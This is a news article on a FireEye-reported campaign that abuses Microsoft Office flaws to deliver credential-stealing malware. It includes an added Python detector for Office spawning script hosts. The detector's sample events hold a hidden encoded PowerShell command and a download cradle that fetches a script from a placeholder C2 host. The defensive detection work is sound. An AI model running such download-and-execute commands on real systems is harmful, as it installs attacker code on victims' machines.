Vulnerabilities in Microsoft Office are being exploited by hackers to spread complex malware that is capable of stealing credentials, dropping additional malware, mining cryptocurrency, and conducting distributed denial-of-service (DDoS) attacks.
The malware is not new as it has been active since 2016 but it appears that it can be purchased on underground forums for as little as $75 (THB2,400).
Researchers at FireEye highlighted the problem, saying that hackers are attempting to exploit vulnerabilities in Microsoft Office.
Hackers are sending phishing emails containing malicious documents which recipients are encouraged to open. If a document is opened, the victim's machine becomes infected with the malware.
The main vulnerability exploited by the attackers is CVE-2017-11882, a security vulnerability in Microsoft Office that enables arbitrary code to run when a maliciously modified file is opened. In this campaign, exploitation triggers additional downloads; the downloaded content contains a PowerShell script which then drops the malware onto the victim's device.
If the PowerShell script runs successfully, it injects code which downloads the final payload from the malicious command and control server. That payload unpacks the malware onto the target computer, alongside functionality that allows the attacker to use Tor to hide their tracks.
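The chain described above (a document opened in Office, the exploit triggering, then a script host fetching a payload from a remote server) leaves a distinctive trail in process-creation telemetry. The following is an added detection example, not code from the article or from FireEye; it runs over constructed sample events loosely modelled on Sysmon process-creation fields (the field names, hostnames, URL and encoded string are all placeholders). It assumes, as is publicly documented, that CVE-2017-11882 is exploited through the legacy Equation Editor component, which runs as the separate process `EQNEDT32.EXE` under the Office application.

```python
import json
from typing import Optional

# Office applications in which users open mail attachments. A script host started
# directly under one of these, or under the Equation Editor component that
# CVE-2017-11882 abuses, is the behaviour the article describes and is rare in
# ordinary document use.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQUATION_EDITOR = "eqnedt32.exe"  # legacy Equation Editor process (component hit by CVE-2017-11882)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Substrings typical of a PowerShell "download cradle" command line.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "net.webclient", "-enc")

# Constructed sample events (not real telemetry). Field names are assumptions loosely
# modelled on Sysmon Event ID 1; the base64 string is a placeholder, not a real payload.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"host": "ws01", "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "command_line": "EQNEDT32.EXE -Embedding"},
    {"host": "ws01", "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c powershell -nop -w hidden -enc UExBQ0VIT0xERVI="},
    {"host": "ws02", "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Invoke-WebRequest -Uri http://intranet.example.invalid/report.csv"},
    {"host": "ws04", "parent_image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 12288"},
])


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a rule name if the event matches the Office-to-script-host chain, else None."""
    parent = _basename(event["parent_image"])
    child = _basename(event["image"])
    cmd = event.get("command_line", "").lower()
    if parent == EQUATION_EDITOR and child != EQUATION_EDITOR:
        # The Equation Editor has no business spawning other processes; any child
        # under it is the CVE-2017-11882 exploitation pattern. Office launching the
        # editor itself is normal when a document embeds an equation, so that is not flagged.
        return "eqnedt32_spawned_child"
    if parent in OFFICE_HOSTS and child in SCRIPT_HOSTS:
        if any(marker in cmd for marker in DOWNLOAD_MARKERS):
            return "office_spawned_download_cradle"
        return "office_spawned_script_host"
    return None


def detect(jsonl: str) -> list:
    """Run classify() over newline-delimited JSON events and return the hits."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        rule = classify(event)
        if rule:
            hits.append({"host": event["host"], "rule": rule,
                         "parent": _basename(event["parent_image"]),
                         "child": _basename(event["image"])})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Run as-is, the script flags two of the five constructed events: the Equation Editor spawning `cmd.exe` on ws01, and Word spawning a PowerShell download cradle on ws02. PowerShell under Explorer and Excel's print helper are left alone, which is the point of keying on the parent process rather than on PowerShell alone.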
The malware allows hackers to steal passwords from a range of sources leaving the victim wide open to both identity and financial theft.
“Threat actors incorporating recently discovered vulnerabilities in popular software – Microsoft Office, in this case – only increases the potential for successful infections. These types of threats show why it is very important to ensure that all software is fully updated,” FireEye researchers Swapnil Patil and Yogesh Londhe said in a blog post about the issue.
Users should ensure they’ve downloaded all the patches published to protect against CVE-2017-11882 and CVE-2017-8759.
“Security updates were released last year and customers that have applied them, or have automatic updates enabled are protected,” a Microsoft spokesperson told ZDNet.